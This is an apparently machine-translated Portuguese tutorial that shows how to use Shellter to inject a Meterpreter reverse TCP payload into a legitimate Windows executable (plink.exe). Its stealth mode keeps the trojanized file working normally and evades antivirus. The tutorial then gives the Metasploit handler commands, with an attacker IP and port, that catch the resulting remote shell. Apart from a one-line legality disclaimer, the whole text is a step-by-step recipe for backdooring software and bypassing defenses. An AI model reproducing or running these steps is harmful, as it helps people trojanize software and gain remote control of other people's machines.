Tendo problemas para obter uma shell Meterpreter passado que AV traquinas? Confira o novo 5.1 Shellter ferramenta de injeção de shellcode! A última versão do Shellter para pentesters inclui um modo "stealth" que mantém a funcionalidade do programa host original.
Shellter trabalha levando um arquivo .exe legítimo do Windows,
acrescenta o código shell para ele e, em seguida, faz um ótimo trabalho
de modificar o arquivo para o desvio AV. Modo automático do programa faz todo o processo muito livre de dor.
A nova versão do Shellter não está incluído nos repositórios ainda,
então se você quiser a versão mais recente você precisará baixar o
arquivo zip e instalá-lo manualmente.
Então, chega de conversa, vamos vê-lo em ação!
(Nota: Como sempre, nunca tente acessar um sistema que você não tem permissão expressa por escrito para fazê-lo Fazer isso é ilegal e você pode acabar na cadeia..)1. Baixe e instale "shellter" (https://www.shellterproject.com/download/)
Salvei a pasta extraída para a pasta / root / Desktop. Você terá que tornar o arquivo executável shellter.exe com o comando chmod.
2. Grab "plink.exe" a partir do diretório de Kali 'usr/share/windows-binaries' e copiá-lo para o diretório Shellter.
3. Mude para o diretório "/root/Desktop/shellter '.
4. Start Shellter – type, “wine shellter.exe”

5. Digite "A" para automático
6. No Alvo PE Prompt, digite "plink.exe"
7. Quando solicitado para habilitar o modo furtivo digite "Y":

Esta nova funcionalidade permite que o arquivo para backdoored ainda funcionam como arquivo originalmente. Uma grande ajuda para pentesters Red equipe.
8. Quando solicitado para Payloads selecionar "L" e "1" para Meterpreter_Reverse_TCP.
9. Digite seu endereço de IP para Kali LHOST.
10. Digite uma porta para usar (eu usei 4545)

Shellter, então, adicionar código polimórfico e Ofuscação o arquivo. Quando terminar, você verá:

Você terá agora um "plink.exe '(o arquivo shellcoded) e' plink.exe.bak '(o arquivo original) no diretório Shellter.
11. Agora, precisamos iniciar um serviço de escuta no sistema Kali usando as mesmas configurações de cima:
- start Metasploit (‘msfconsole’ in a terminal)
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.1.39
- set lport 4545
- exploit

12. Copie o arquivo 'plink.exe' para o sistema Windows:

13. Agora, no Windows, se você executar plink.exe partir da linha de comando:

Ele lista as informações de ajuda para o arquivo, mas não acionar o shell remoto ainda. Mas se nós realmente usar plink se conectar a outro sistema (a Pi Raspberry) como visto abaixo:

Observe que o prompt de login ssh Raspberry Pi através Plink, mas também temos uma sessão remota para a caixa do Windows:

Nós podemos correr "sysinfo" para visualizar informações sobre o computador:

Sucesso!